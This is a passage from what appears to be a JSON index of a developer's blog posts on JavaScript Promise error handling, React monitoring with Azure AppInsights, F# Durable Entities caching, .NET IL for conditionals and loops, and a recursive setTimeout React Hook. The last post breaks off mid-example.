to look elsewhere.\nPromises don’t error per se, they reject (which can represent an error or just being unsuccessful), and that rejection may be unhandled which will result in the unhandledrejection event being triggered.\nonunhandledrejection can be assigned directly off window like so:\n1 2 3 window.onunhandledrejection = function (error) { console.error(`Promise failed: ${error.reason}`); }; This is similar to onerror, but it doesn’t have quite as much information provided. All you receive in this event handler is the Promise that failed and the “reason” provided to the rejection. This does mean that you don’t get some useful information like source file or line number, but that’s a trade-off because it’s come from an async operation.\nYou can also call preventDefault on the error object which will prevent writing to console.error, which can be useful if you want to avoid leaking information to the debug console.\nHandling the Handled While you can capture unhandled rejections you can also capture handled rejections using the rejectionhandled event. While I find it annoying that it’s an inconsistent name (Rejection Handled to go along with Unhandled Rejection, why aren’t they consistent with where the word Rejection is!) this event handler works the same as the other one but will be triggered when a catch handled is provided.\nThis handler is useful if you’re doing a monitoring platform you might want to log all rejections, handled or not.\nConclusion If you’re building an application you should always look to include global error handling. 
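Pulled together, a minimal global setup might look something like this (just a sketch; where the events end up getting logged is up to whatever monitoring platform you're using):
// Uncaught synchronous errors that bubble all the way up.
window.addEventListener("error", (event) => {
  console.error("Uncaught error:", event.message);
});

// Rejected Promises that nothing handled.
window.addEventListener("unhandledrejection", (event) => {
  console.error("Unhandled rejection:", event.reason);
  // event.preventDefault(); // uncomment to keep it out of the console
});

// Rejections that were eventually handled by a catch handler.
window.addEventListener("rejectionhandled", (event) => {
  console.warn("Rejection handled after the fact:", event.reason);
});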
It’s very common to handle onerror, but it’s quite easy to forget about global error handling for Promises, which is easy to add with onunhandledrejection.\n", "id": "2019-10-11-catching-all-promise-errors" }, { "title": "Implementing Monitoring in React Using AppInsights", "url": "https://www.aaron-powell.com/posts/2019-10-04-implementing-monitoring-in-react-using-appinsights/", "date": "Fri, 04 Oct 2019 09:00:02 +1000", "tags": [ "react", "azure", "javascript" ], "description": "Monitoring of SPAs is important, so let's look at how to do that in a React app using AppInsights", "content": "When I was consulting, one of the things done early on in many projects was to integrate a monitoring/logging platform. This would be used to give insight into common scenarios such as how long IO took, to trace data flows within the application, and to handle expected and unexpected errors. All of this would be baked into our API endpoints and generally just ran smoothly.\nBut there was always one place where it wasn’t prioritized: the browser. Sometimes Google Analytics would be integrated (or, if you wanted some real fun, you could do it with plain old CSS), but that was more for public websites/marketing sites, and it really only focused on traffic sources, not true monitoring.\nToday, I want to have a look at how we can set up a monitoring solution for React using Azure AppInsights.\nWhat is AppInsights AppInsights (Application Insights in its long-form) is part of the Azure Monitor platform and provides performance monitoring for applications from web to mobile, across a number of languages.\nWhile I won’t cover all its features here, the most interesting ones for a web application (SPA or otherwise) are capturing information such as page views, errors (handled and unhandled) and AJAX calls (XMLHttpRequest and Fetch). 
Combining this both client and server can make it useful to provide a full view of a user’s interactions on your site.\nGetting Started For this demo I’m using a Gatsby e-commerce starter kit and you’ll find the completed demo on my GitHub.\nI’ve extended it to use the JavaScript SDK for AppInsights which just so happens to have a React extension.\nConfiguring AppInsights First things first, we need to have an AppInsights instance which we can use, and to do that you’ll need to create a resource in Azure (if you don’t already have an Azure account you can sign up for a free trial) and copy the instrumentation key.\nOnce you have the instrumentation key create a .env.development file to set up the environment variable that Gatsby will look for:\n1 APPINSIGHTS_KEY=<instrumentation key here> Now we’re ready to start integrating AppInsights into our application, and we’ll start by creating a service that will setup the instrumentation for us:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 // AppInsights.js import { ApplicationInsights } from '@microsoft/applicationinsights-web' import { ReactPlugin, withAITracking } from '@microsoft/applicationinsights-react-js' import { globalHistory } from "@reach/router" const reactPlugin = new ReactPlugin(); const ai = new ApplicationInsights({ config: { instrumentationKey: process.env.APPINSIGHTS_KEY, extensions: [reactPlugin], extensionConfig: { [reactPlugin.identifier]: { history: globalHistory } } } }) ai.loadAppInsights() export default (Component) => withAITracking(reactPlugin, Component) export const appInsights = ai.appInsights This file is responsible for two things, the first is to set up the AppInsights connection using the key provided (we’re using an environment variable to store this which allows us to use a different one on each environment) and the second job is to export a Higher Order Component (HOC) that provides our AppInsights instance to the HOC provided by the React extension (this is just a convenience approach, you don’t need to wrap the HOC if you’d prefer not to add additional components).\nThe main difference here from the documentation of the React extension is providing the history information. Gatsby uses @reach/router not react-router, so we don’t create the history object, we use the one that the router defines for us (exposed as globalHistory from the @reach/router package).\nTracking Pages With AppInsights now available in our application let’s start by enabling it on all pages so that we can track page visits and any unhandled errors. The best place for us to do this is on the top-most component that we have access to, normally this would be you’re <App /> component that goes into the DOM. 
With Gatsby we don’t have access to that component, instead would use the files in the pages directory, but with this template we’re modifying the components/Layout rather than any of the pages since <Layout /> is the topmost component used on every page.\nWe’ll wrap the component with our HOC like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 import React from 'react' import Headroom from 'react-headroom' import { Container } from 'semantic-ui-react' import Footer from '../Footer' import Header from '../Header' import withAppInsights from '../../AppInsights'; import 'semantic-ui-css/semantic.min.css' const Layout = ({ location, children }) => ( <> <Headroom upTolerance={10} downTolerance={10} style={{ zIndex: '20', height: '6.5em' }} > <Header location={location} /> </Headroom> <Container text>{children}</Container> <Footer /> </> ) export default withAppInsights(Layout) If you start navigating around and look into your developer tools Network tab you’ll see requests being made to AppInsights!\nIn the above screenshot I have a few objects in the output payload (AppInsights batches requests to upload metrics ever 15000ms which is configurable), one of which is the metrics information for the previous page we were on (how long the component was mounted for) with the other being the navigation event.\nIt’s worth noting that you don’t have to wrap the whole page, you can just wrap the specific components that you want to track instead. The HOC provided by the React extension will wrap your component in a <div> and attach event handles to user interaction events (such as click, mouse movement and touch) so that it can track the event of “when the component was interacted with”. When the HOC is unmounted it will send metrics to AppInsights about how long the component was interacted with. Here we’re combining Page View and Component Interaction into a single example.\nNow we’re starting to track how long a user spends on a page and what pages they have visited, let’s have a look at some specialised monitoring.\nMonitoring Specific User Interactions Let’s say you’re trying to understand user behaviour on the site and you want to know about specific actions, such clicking the “Add to Cart” button. To do this we can use the trackEvent custom metric tracking:\n1 2 3 4 const handleSubmit = async () => { appInsights.trackEvent({ name: 'Add To Cart', properties: { productId } }) // snip } Here we’re using the appInsights object that we are exporting from where we set up the AppInsights instance and passing through some data to trackEvent, the name of the event we’re tracking (which we can filter on in the Azure Portal) and then any custom properties we want to include in the event. Here we’re passing through the productId, so you could determine how frequently a specific product is added to carts, but you could add any information that would be useful to understand and provide context to the event.\nMonitoring Failures Applications do have bugs, it’s a fact of life, but we want to know when those failures happen. When these happen in JavaScript it’s often not captured, they may be completely silent to the user and result in interactions failing until they reload the page. The AppInsights JavaScript SDK captures unhandled exceptions that trigger window.onerror (and if this PR is merged unhandled promise rejections), but what about errors that we can handle? 
maybe a network request failed and we showed the user a message, we might want to try and track that event so we can correlate client and server metrics.\nTo do this we can use the trackException method:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 const handleSubmit = async () => { appInsights.trackEvent({ name: 'Add To Cart', properties: { productId } }) const cartId = await localStorage.getItem('mcart') const error = validate(quantity) setError(error) if (!error) { setLoading(true) Moltin.addToCart(cartId, productId, quantity) .then(() => { addToCart(quantity, cartId) setLoading(false) setQuantity(quantity) setVisible(true) toggleMessage() }) .catch(err => { setError(`Error: ${err.errors[0].detail}` || 'Something went wrong') setLoading(false) appInsights.trackException({ error: new Error(err), severityLevel: SeverityLevel.Error }) }) } } Here at the end of the Promise catch we’re calling trackException and passing in an object that contains the error information and a severityLevel for the event of Error. The severityLevel is important to control here as that can be used by Azure to trigger alerting rules defined in AppInsights and if it’s an error that’s originated server-side maybe you don’t want to double-trigger an alert.\nViewing Metrics in Azure Now that we’re starting to generate metrics as we navigate around the site, let’s head over to the Azure Portal, navigate to our AppInsights resource and select Log (Analytics) under the Monitoring section.\nThis is a place where you can create queries against the AppInsights data that is being captured from your application and it has a reasonably easy to pick up query language. We’ll start with a simple query to show some page views:\npageViews | limit 50 This opens the pageViews table and we use the pipe (|) character to denote commands, in this case, the command we’re executing limit command with a value of 50, which limits the number of results returned in the query to 50.\nThe screenshot shows the returned results, in which we see a bunch of pages which I navigated around.\nLet’s look at our custom event, tracking the clicks on the Add to Cart button:\ncustomEvents | where name == "Add To Cart" | limit 50 For this query we open the customEvents table, since it wasn’t a predefined metric type and add a where filter against the name to limit it to Add To Cart.\nThere we can see three Add To Cart operations, and which products were added to the cart. With the query you could expand the condition clauses to look for specific products or any other information you’ve captured on the event.\nConclusion This post has given us an introduction to Azure AppInsights, and in particular the React extension. 
We’ve seen how to integrate page view tracking as well as tracking custom metrics against specific interactions and finally error tracking, before looking at how we can start viewing that data in the Azure Portal.\n", "id": "2019-10-04-implementing-monitoring-in-react-using-appinsights" }, { "title": "Using Durable Entities and Orchestrators to Create an Api Cache", "url": "https://www.aaron-powell.com/posts/2019-09-27-using-durable-entities-and-orchestrators-to-create-an-api-cache/", "date": "Fri, 27 Sep 2019 09:01:28 +1000", "tags": [ "serverless", "fsharp", "azure-functions" ], "description": "Let's look at how you can use Entities in Durable Functions v2 to create an API cache", "content": "This post is part of #ServerlessSeptember, a month-long series we’ve been producing as part of the Cloud Advocate team.\nI’ve been playing a bunch with Durable Entities and I must say, I really love the experience of building with the framework, but what I find really cool is how it can integrate seamlessly with Orchestrators from Durable Functions v1.\nFor a demo I’ve been working on I need to pull data from an external API, but this API a) has a rate limit on it and b) can vary in the response time. Because of this I wanted to work out how I could cache the response from it for a period of time.\nIn a traditional API I would be doing this by writing to a data store (maybe Redis) and then keeping track of a timestamp when I wrote the data, and if it’s stale I’d re-fetch the data and update it. But with Durable Entities we can persist some state without a whole lot of effort!\nCreating Our Entity Let’s create a generic base for our cache and implement it (we’ll just cache string array in our API, but you could use anything here):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 type ICache<'T> = abstract member Init: 'T -> unit abstract member Clear: unit -> unit [<AbstractClass>] type Cache<'T>() = [<JsonProperty>] member val Items = Unchecked.defaultof<'T> with get, set member this.Init i = this.Items <- i member __.Clear() = Entity.Current.DestructOnExit() interface ICache<'T> with member this.Init i = this.Init i member this.Clear() = this.Clear() type StringArrayCache() = inherit Cache<string array>() [<FunctionName("StringArrayCache")>] static member Run ([<EntityTrigger>] ctx: IDurableEntityContext) = ctx.DispatchAsync<StringArrayCache>() Quick note, in F# you need to create a member of the class and the interface due to this bug, that’s why I have an Init method on the interface which just calls the Init method on the class.\nOur StringArrayCache Entity will be initialised with a value and we intend to store that value until the cache expires.\nCreating a HTTP Function With our Entity defined it’s time to create the Function that we’re calling that caches data:\n1 2 3 4 5 6 7 [<FunctionName("HttpCachingFunction")>] let run ([<HttpTrigger(AuthorizationLevel.Function, "get", Route = "data")>] req : HttpRequest) ([<DurableClient>] client: IDurableClient) = task { // todo } This is a standard HTTP triggered function and will be responsible for populating our cache. This might not be the most optimal way to do it in your project, maybe you want a timer trigger that runs on start up and then ever n number of minutes, but I just want to keep it simple. 
The second argument is a DurableClient binding which will be what we use to work with the Entity and Orchestrator.\nNote: In v1 this binding was called OrchestrationClient, but was renamed to DurableClient for v2.\n1 2 3 4 5 6 7 8 9 [<FunctionName("HttpCachingFunction")>] let run ([<HttpTrigger(AuthorizationLevel.Function, "get", Route = "data")>] req : HttpRequest) ([<DurableClient>] client: IDurableClient) = task { let entityId = EntityId(typeof<StringArrayCache>.Name, "Cache") return OkResult() } We’re starting to scaffold out our Function, the first thing we’re going to need is a Cache Identifier, which is in the form of the EntityId. I’ve got this hard coded to be the name of our cache class (if I was using F# 4.7 with preview features I could use nameof like in C#) and the key Cache. If you were doing cache-by-user then maybe you’d use the user ID as the cache key.\nNote: The Entity Name, which I defined as typeof<StringArrayCache>.Name, must match the value provided to the FunctionName attribute on the Entity, again where nameof can be useful.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 [<FunctionName("HttpCachingFunction")>] let run ([<HttpTrigger(AuthorizationLevel.Function, "get", Route = "data")>] req : HttpRequest) ([<DurableClient>] client: IDurableClient) = task { let entityId = EntityId(typeof<StringArrayCache>.Name, "Cache") let! state = client.ReadEntityStateAsync<StringArrayCache> entityId if state.EntityExists then return OkObjectResult state.EntityState.Items else // Todo return OkResult() } With the Cache Identifier defined it’s time to look up whether it does already exist in the cache, and we do that by reading the Entity State from the IDurableClient input. This returns us an object with an EntityExists boolean property and if it does exist we can access that Entity via EntityState, so we’re returning the Items property if it does exist, which is where our cached data lives.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 [<FunctionName("HttpCachingFunction")>] let run ([<HttpTrigger(AuthorizationLevel.Function, "get", Route = "data")>] req : HttpRequest) ([<DurableClient>] client: IDurableClient) = task { let entityId = EntityId(typeof<StringArrayCache>.Name, "Cache") let! state = client.ReadEntityStateAsync<StringArrayCache> entityId if state.EntityExists then return OkObjectResult state.EntityState.Items else do! Task.Delay 5000 let cachedData = [|"a";"b";"c"|] do! client.SignalEntityAsync<ICache<string array>>( entityId, fun (proxy: ICache<string array>) -> proxy.Init cachedData ) return OkObjectResult cachedData } If the Entity doesn’t exist then we need to fetch the data from our external source (I’m simulating this with a Task.Delay) and once we have the data we can initalise our Entity with client.SignalEntityAsync. I’m doing this using the Typed Client approach, where you need to provide the interface that your Entity implements. Since I’m using a generic base class I provide it with ICache<string array>, next we provide it with the EntityId we created above and the signaling method. This method is provided with a proxy instance of your Entity (cast as the interface) and allows you to do whatever you want before calling a specific method on the Entity itself. 
I’ve kept it simple and just called the Init method providing our data to cache.\nFinally, we return the data from this brach so that the responses are the same, regardless of whether it was cached or not.\nInteresting side note, the proxy is a dynamically generated class, not your actual implementation (my StringArrayCache). Instead it does some “magic” which results in calling your EntityTrigger function. The way this works is quite interesting and I’ll explore it in my IL blog series.\nWe’re done now, our data will be cached forever with that entity.\nCreating a Cache Timeout While an infinite cache might be good, we probably want the data to expire at some point in time and either automatically replaced or only replaced when it’s next required. To achieve this we’ll use a Durable Orchestrator which was introduced in the Durable Functions v1 release.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 [<FunctionName("CacheOrchestrator")>] let cacheOrchestrator ([<OrchestrationTrigger>] ctx: IDurableOrchestrationContext) (logger: ILogger) = task { logger.LogInformation "Starting Cache manager" let entityId = ctx.GetInput<EntityId>() let timer = ctx.CreateTimer(ctx.CurrentUtcDateTime.AddMinutes(1.), CancellationToken.None) do! timer logger.LogInformation "Cache cleaning" ctx.SignalEntity(entityId, "Clear") } The Orchestrator is pretty simple if you’ve been working with Durable Functions v1. We start off with a trigger type of OrchestrationTrigger and the type we expect is an IDurableOrchestrationContext.\nNote: This is a type change from Durable Functions v1. In v1 it was a class named DurableOrchestrationContext, now we have an interface which is prefixed with I as per the .NET style guide.\nSince this Orchestrator is to be generic we’re expecting the EntityId to be passed in as input, so it could be responsible for the timeout handling of multiple caches.\nNow we can create a Timer for our cache expiry using the context’s CreateTimer function. As per the guidance in the documentation we’re using the CurrentUtcDateTime from the context and then adding 1 minute to it, this is when our cache will expire. (I’d consider passing in the timeout duration, rather than hard-coding it like I have, but I kept it simple for this demo.)\nWe then wait for the timer to elapse (do! timer) and once it’s done we need to tell the cache Entity to destroy itself, and this is where the Clear method on our Entity comes in. It’s also worth noting that this time when we signal the Entity it’s using a synchronous method called SignalEntity and it requires you to pass in the name of the method you want to call (this is similar to untyped signaling).\nThe Clear method looks like this:\n1 2 member __.Clear() = Entity.Current.DestructOnExit() And it called the DestructOnExit method of the current Entity, which isn’t actually a function of the class itself, but it tells the Durable Entity framework that this Entity has completed and can be deleted. This is similar to when an Orchestrator function finishes and the RuntimeStatus is Completed.\nConclusion This brings us to the end of todays post, we’ve seen how we can combine Entities and Orchestrators in a single set of functions. 
We used this to create a cache of responses for HTTP calls, but we could use this on any data access happening within our Serverless application.\nMake sure you check out the rest of #ServerlessSeptember for more Serverless content!\nBonus Tip It’s likely that when we get an RTM of Durable Entities we won’t need to use the Orchestrator for the timer as they are getting that support.\n", "id": "2019-09-27-using-durable-entities-and-orchestrators-to-create-an-api-cache" }, { "title": "Adventures in IL: Conditionals and Loops", "url": "https://www.aaron-powell.com/posts/2019-09-24-adventures-in-cil-conditionals-and-loops/", "date": "Tue, 24 Sep 2019 09:33:46 +1000", "tags": [ "dotnet", "csharp", "fsharp" ], "description": "It's time to take another look at CIL, how do conditionals and loops work?", "content": "Last time we explored IL (well, CIL, but most people know it as just IL) we were introduced to OpCodes and their meaning by going through a really simple method. Today, I want to look at two common statements we use in programming, conditional statements (if and switch) and loops (for, foreach, etc.). We’ll also look at something that we skipped from the last post, the difference between Debug and Release builds (well, building with or without compiler optimisations).\nIf Statements Let’s take the following F# function:\n1 2 3 4 5 let ifStatement a = if a = 1 then Console.WriteLine "one" else Console.WriteLine "not one" I’m using Console.WriteLine rather than the F# Core.Printf module and printfn as it makes less verbose code. Normally in F# I’d use printfn though.\nThis will generate the following IL:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 IL_0000: ldarg.0 IL_0001: ldc.i4.1 IL_0002: bne.un.s IL_0006 IL_0004: br.s IL_0008 IL_0006: br.s IL_0013 IL_0008: ldstr "one" IL_000d: call void [mscorlib]System.Console::WriteLine(string) IL_0012: ret IL_0013: ldstr "not one" IL_0018: call void [mscorlib]System.Console::WriteLine(string) IL_001d: ret There are a few OpCodes which are familiar but we’re also meeting a some new ones. The first two in our output are responsible for loading the value of the argument (a in our code) onto the stack and then pushing the int32 value 1 onto the stack. Now we’re getting to a new OpCode and we’re also going to need to understand a bit more about the piece that is to the left of the : (that we ignored last time), which is called the instruction prefix.\nAn instruction in IL can be made up of two pieces of information in the format of prefix: instruction. Let’s take the following line:\n1 IL_0002: bne.un.s IL_0006 Here we have a prefix of IL_0002 and the instruction for that line is bne.un.s IL_0006 which is define here. To quote the documentation for the instruction for bne.un.s:\nTransfers control to a target instruction (short form) when two unsigned integer values or unordered float values are not equal.\nThat’s interesting, it’s a not equal operation whereas our code was if a = 1 then, so the IL represents the inverse of what our code represented. To understand why we need to look at the rest of the instruction, and the rest of the IL, since there’s another bit of information passed to bne.un.s, IL_0006, which represents the target instruction to transfer control to. 
Effectively what this says is “if the two values don’t match the next line to execute is IL_0006”.\nHere’s where that sits in the IL:\n1 2 3 IL_0004: br.s IL_0008 IL_0006: br.s IL_0013 You’ll notice that IL_0006 is after IL_0004, so we’re skipping IL_0004, essentially using a goto statement!\nJust an aside, F# doesn’t have a goto statement, C# does!\nBoth IL_0004 and IL_0006 use br.s which again transfers control to another instruction:\n1 2 3 4 5 6 7 IL_0008: ldstr "one" IL_000d: call void [mscorlib]System.Console::WriteLine(string) IL_0012: ret IL_0013: ldstr "not one" IL_0018: call void [mscorlib]System.Console::WriteLine(string) IL_001d: ret Both of these blocks are pretty similar, IL_0008 is the start of the truthy branch of our if statement, loading a string onto the stack then calling Console.WriteLine before issuing a ret to end the method. IL_0013 is the falsey branch and using the control transfer we skip over the truthy block.\nSo if we break it down, an if statement is a series of GOTO calls to jump over blocks we don’t want to execute.\nIf Statements in C# Out of curiosity, I decided to create the same example in C#:\n1 2 3 4 5 6 7 8 9 10 11 public void IfStatements(int a) { if (a == 1) { Console.WriteLine("One"); } else { Console.WriteLine("Not One"); } } And what I found is that it generates different IL!\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 IL_0000: nop IL_0001: ldarg.1 IL_0002: ldc.i4.1 IL_0003: ceq IL_0005: stloc.0 IL_0006: ldloc.0 IL_0007: brfalse.s IL_0018 IL_0009: nop IL_000a: ldstr "One" IL_000f: call void [mscorlib]System.Console::WriteLine(string) IL_0014: nop IL_0015: nop IL_0016: br.s IL_0025 IL_0018: nop IL_0019: ldstr "Not One" IL_001e: call void [mscorlib]System.Console::WriteLine(string) IL_0023: nop IL_0024: nop IL_0025: ret What’s interesting here is that in the C# version it uses ceq and combines it with brfalse.s. ceq does an equality test on two values and if they are equal it pushes 1 onto the stack, otherwise 0, and then brfalse.s transfers control to an instruction, IL_0018 in our case, if the value on the stack is false, null or 0.\nYou’ll also notice the use of br.s when the truthy block finishes skipping over the falsey block and land on ret, whereas F# just inlined the ret.\nThis makes the C# version a little more verbose than the F# version when achieving the same thing.\nDebug vs Release Both of the above examples are compiled using “Debug mode”, so there are no compiler optimisations enabled. But that’s not what you’re going to deploy to production (right? RIGHT!) so again I was interested to see the differences there. Here’s the F# one compiled with optimisations:\n1 2 3 4 5 6 7 8 9 10 11 IL_0000: ldarg.0 IL_0001: ldc.i4.1 IL_0002: bne.un.s IL_000f IL_0004: ldstr "one" IL_0009: call void [mscorlib]System.Console::WriteLine(string) IL_000e: ret IL_000f: ldstr "not one" IL_0014: call void [mscorlib]System.Console::WriteLine(string) IL_0019: ret And here’s C#:\n1 2 3 4 5 6 7 8 9 10 11 IL_0000: ldarg.1 IL_0001: ldc.i4.1 IL_0002: bne.un.s IL_000f IL_0004: ldstr "One" IL_0009: call void [mscorlib]System.Console::WriteLine(string) IL_000e: ret IL_000f: ldstr "Not One" IL_0014: call void [mscorlib]System.Console::WriteLine(string) IL_0019: ret Well, they look very similar don’t they, in fact, they are identical (I had to check a few times that yes, I was copying different ones!). 
They both resemble the unoptimised F# output, but with the minor difference of a few less br.s instructions around the place.\nFor Loops When it comes to loops I tend to use the for loop most commonly, so we’ll use that for our exploration today. Starting with a simple F# function:\n1 2 3 let forLoop() = for i in 0 .. 99 do Console.WriteLine i Which results in the following IL:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 IL_0000: ldc.i4.0 IL_0001: stloc.0 IL_0002: br.s IL_000e // loop start (head: IL_000e) IL_0004: ldloc.0 IL_0005: call void [mscorlib]System.Console::WriteLine(int32) IL_000a: ldloc.0 IL_000b: ldc.i4.1 IL_000c: add IL_000d: stloc.0 IL_000e: ldloc.0 IL_000f: ldc.i4.1 IL_0010: ldc.i4.s 99 IL_0012: add IL_0013: blt.s IL_0004 // end loop IL_0015: ret I’ve left some indentations and comments that IL Spy generated for me to help visualise the IL a bit better.\nWe start by pushing the initial value of i onto the stack with ldc.i4.0 and then ensure the stack is at the right location with stloc.0 before using br.s to move down to IL_000e. This is the start of our equality test to ensure that we’re still in the loop range:\n1 2 3 4 5 IL_000e: ldloc.0 IL_000f: ldc.i4.1 IL_0010: ldc.i4.s 99 IL_0012: add IL_0013: blt.s IL_0004 Location 0 is loaded on the stack (which is our i value) then the values of 1 and 99 are pushed onto the stack with ldc.i4.1 and ldc.i4.s respectively (ldc.i4.1 is shorthand for ldc.i4.s 1, and likely optimised by your runtime) before add is called which pushes the value of 100 onto the stack. Finally blt.s is called and if the value in stack position 0 is less than the result of add we’ll transfer control higher up in the instruction list, specifically to IL_0004. Now we’ve ended up with this block:\n1 2 3 4 5 6 IL_0004: ldloc.0 IL_0005: call void [mscorlib]System.Console::WriteLine(int32) IL_000a: ldloc.0 IL_000b: ldc.i4.1 IL_000c: add IL_000d: stloc.0 We grab the value from stack position 0, hand it to Console.WriteLine, get it again, add 1 to it and fall through to IL_000e since there’s no control transfer.\nI find this order quite interesting, the output IL is in reverse order to what I expected it to be, the conditional test is at the end of the instruction list, but upon dissection it makes a lot of sense. If the conditional test was at the top you’d always have to use a br.s to transfer control back up to the top when the loop body finishes and then have a control transfer test (a brtrue.s) if the range was exceeded. This would be inefficient as you’d always execute a control transfer and then have a second potental control transfer, whereas having it in reverse you only have 1 control transfer and it’s conditional.\nFor Loops in C# Again we’ll look at a C# implementation:\n1 2 3 4 5 6 7 public void ForLoop() { for (var i = 0; i < 100; i++) { Console.WriteLine(i); } } Resulting in the following IL:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 IL_0000: nop IL_0001: ldc.i4.0 IL_0002: stloc.0 IL_0003: br.s IL_0012 // loop start (head: IL_0012) IL_0005: nop IL_0006: ldloc.0 IL_0007: call void [mscorlib]System.Console::WriteLine(int32) IL_000c: nop IL_000d: nop IL_000e: ldloc.0 IL_000f: ldc.i4.1 IL_0010: add IL_0011: stloc.0 IL_0012: ldloc.0 IL_0013: ldc.i4.s 100 IL_0015: clt IL_0017: stloc.1 IL_0018: ldloc.1 IL_0019: brtrue.s IL_0005 // end loop IL_001b: ret It’s pretty similar to the F# version (ignoring the nop instructions) except how the equality test is done. 
In our F# version, like with the if statement, the equality test was combined with the control transfer using blt.s whereas C# uses clt and brtrue.s to compare the values and then transfer control.\nThe other major difference is that the C# version loads 100 onto the stack for the clt test but F# pushes 1 and 99, then adds them together, meaning it’s equality test is more akin to i < 1 + 99 rather than C#’s i < 100.\nDebug vs Release It’s time to compare what happens when we enable compiler optimisations, starting with F#:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 IL_0000: ldc.i4.0 IL_0001: stloc.0 IL_0002: br.s IL_000e // loop start (head: IL_000e) IL_0004: ldloc.0 IL_0005: call void [mscorlib]System.Console::WriteLine(int32) IL_000a: ldloc.0 IL_000b: ldc.i4.1 IL_000c: add IL_000d: stloc.0 IL_000e: ldloc.0 IL_000f: ldc.i4.s 100 IL_0011: blt.s IL_0004 // end loop IL_0013: ret And now C#:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 IL_0000: ldc.i4.0 IL_0001: stloc.0 IL_0002: br.s IL_000e // loop start (head: IL_000e) IL_0004: ldloc.0 IL_0005: call void [mscorlib]System.Console::WriteLine(int32) IL_000a: ldloc.0 IL_000b: ldc.i4.1 IL_000c: add IL_000d: stloc.0 IL_000e: ldloc.0 IL_000f: ldc.i4.s 100 IL_0011: blt.s IL_0004 // end loop IL_0013: ret This time we’ve got identical IL (F# even uses 100 rather than doing an addition!), good to know, but also interesting to see just how different the output can be when you enable compiler optimisations.\nConclusion Now we’ve seen some of the nity gritty parts of IL and that everything is just a GOTO statement at the end of the day! 🤣\nUnderstanding how control is transfered around within our IL helps us understand how the compiler makes optimisations and why we should write code in a particular way.\nI’ll leave you with the output of a switch statement, see if you can work out the C# that it was generated from:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 IL_0000: ldarg.1 IL_0001: ldc.i4.1 IL_0002: beq.s IL_000a IL_0004: ldarg.1 IL_0005: ldc.i4.2 IL_0006: beq.s IL_0015 IL_0008: br.s IL_0021 IL_000a: ldstr "One" IL_000f: call void [mscorlib]System.Console::WriteLine(string) IL_0014: ret IL_0015: ldstr "Two" IL_001a: call void [mscorlib]System.Console::WriteLine(string) IL_001f: br.s IL_000a IL_0021: ldstr "Default" IL_0026: call void [mscorlib]System.Console::WriteLine(string) IL_002b: ret Good luck!\n", "id": "2019-09-24-adventures-in-cil-conditionals-and-loops" }, { "title": "Recursive setTimeout with React Hooks", "url": "https://www.aaron-powell.com/posts/2019-09-23-recursive-settimeout-with-react-hooks/", "date": "Mon, 23 Sep 2019 11:44:09 +1000", "tags": [ "react", "javascript", "typescript" ], "description": "How to use React Hooks to create a polling API using setTimeout", "content": "I’m working on a project at the moment where I need to be able to poll an API periodically and I’m building the application using React. I hadn’t had a chance to play with React Hooks yet so I took this as an opportunity to learn a bit about them and see how to solve something that I would normally have done with class-based components and state, but do it with Hooks.\nWhen I was getting started I kept hitting problems as either the Hook wasn’t updating state, or it was being overly aggressive in setting up timers, to the point where I’d have dozens running at the same time.\nAfter doing some research I came across a post by Dan Abramov on how to implement a Hook to work with setInterval. 
Dan does a great job of explaining the approach that needs to be taken and the reasons for particular approaches, so go ahead and read it before continuing on in my post as I won’t do it justice.\nInitially, I started using this Hook from Dan as it did what I needed to do, unfortunately, I found that the API I was hitting had an inconsistence in response time, which resulted in an explosion of concurrent requests, and I was thrashing the server, not a good idea! But this was to be expected using setInterval, it doesn’t wait until the last response is completed before starting another interval timer. Instead I should be using setTimeout in a recursive way, like so:\n1 2 3 4 5 const callback = () => { console.log("I was called!"); setTimeout(callback, 1000); }; callback(); In this example the console is written to approximately once every second, but if for some reason it took longer than basically instantly to write to the console (say, you had a breakpoint) a new timer isn’t started, meaning there’ll only ever be one pending invocation.\nThis is a much better way to do polling than using setInterval.\nImplementing Recursive setTimeout with React Hooks With React I’ve created a custom hook like Dan’s useInterval:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 import React, { useEffect, useRef } from "react"; function useRecursiveTimeout<T>( callback: () => Promise<T> | (() => void), delay: number | null ) { const savedCallback = useRef(callback); // Remember the latest callback. useEffect(() => { savedCallback.current = callback; }, [callback]); // Set up the timeout loop. useEffect(() => { let id: NodeJS.Timeout; function tick() { const ret = savedCallback.current(); if (ret instanceof Promise) { ret.then(() => { if (delay !== null) { id = setTimeout(tick, delay); } }); } else { if (delay !== null) { id = setTimeout(tick, delay); } } } if (delay !== null) { id = setTimeout(tick, delay); return () => id && clearTimeout(id); } }, [delay]); } export default useRecursiveTimeout; The way this works is that the tick function will invoke the callback provided (which is the function to recursively call) and then schedule it with setTimeout. Once the callback completes the return value is checked to see if it is a Promise, and if it is, wait for the Promise to complete before scheduling the next iteration, otherwise it’ll schedule it. This means that it can be used in both a synchronous and asynchronous manner:\n1 2 3 4 5 6 7 8 useRecursiveTimeout(() => { console.log("I was called recusively, and synchronously"); }, 1000); useRecursiveTimeout(async () => { await fetch("https://httpstat.us/200"); console.log("Fetch called!"); }, 1000); Here’s a demo:\nConclusion Hooks are pretty cool but it can be a bit trickier to integrate them with some APIs in JavaScript, such as working with timers. 
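To round it out, here's a hypothetical example of the Hook being used for polling inside a component (the ./useRecursiveTimeout import path and the /api/status endpoint are made up for illustration):
import React, { useState } from "react";
import useRecursiveTimeout from "./useRecursiveTimeout";

const StatusPoller = () => {
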